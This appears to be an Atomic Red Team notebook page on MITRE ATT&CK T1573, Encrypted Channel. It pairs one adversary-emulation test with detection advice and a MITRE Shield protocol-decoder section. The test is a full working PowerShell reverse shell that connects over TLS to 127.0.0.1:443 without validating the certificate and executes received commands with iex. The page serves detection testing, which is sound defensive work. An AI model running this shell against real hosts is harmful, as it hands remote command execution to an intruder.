# T1573 - Encrypted Channel
Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.

## Atomic Tests

In [ ]:
#Import the Module before running the tests.
# Checkout Jupyter Notebook at https://github.com/haresudhan/TheAtomicPlaybook to run PS scripts.
Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force

### Atomic Test #1 - OpenSSL C2
Thanks to @OrOneEqualsOne for this quick C2 method.
This is to test to see if a C2 session can be established using an SSL socket.
More information about this technique, including how to set up the listener, can be found here:
https://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926

Upon successful execution, powershell will make a network connection to 127.0.0.1 over 443.

**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
$server_ip = 127.0.0.1
$server_port = 443
$socket = New-Object Net.Sockets.TcpClient('127.0.0.1', '443')
$stream = $socket.GetStream()
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
$sslStream.AuthenticateAsClient('fake.domain', $null, "Tls12", $false)
$writer = new-object System.IO.StreamWriter($sslStream)
$writer.Write('PS ' + (pwd).Path + '> ')
$writer.flush()
[byte[]]$bytes = 0..65535|%{0};
while(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)
{$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data | Out-String ) 2>&1;
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()}
```

In [ ]:
Invoke-AtomicTest T1573 -TestNumbers 1

## Detection
SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)

In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)

## Shield Active Defense
### Protocol Decoder 
 Use software designed to deobfuscate or decrypt adversary command and control (C2) or data exfiltration traffic. 

 Protocol decoders are designed to read network traffic and contextualize all activity between the operator and the implant. These tools are often required to process complex encryption ciphers and custom protocols into a human-readable format for an analyst to interpret.
#### Opportunity
There is an opportunity to reveal data that the adversary has tried to protect from defenders
#### Use Case
Defenders can reverse engineer malware and develop protocol decoders that can decrypt and expose adversary communications
#### Procedures
Create and apply a decoder which allows you to view encrypted and/or encoded network traffic in a human-readable format.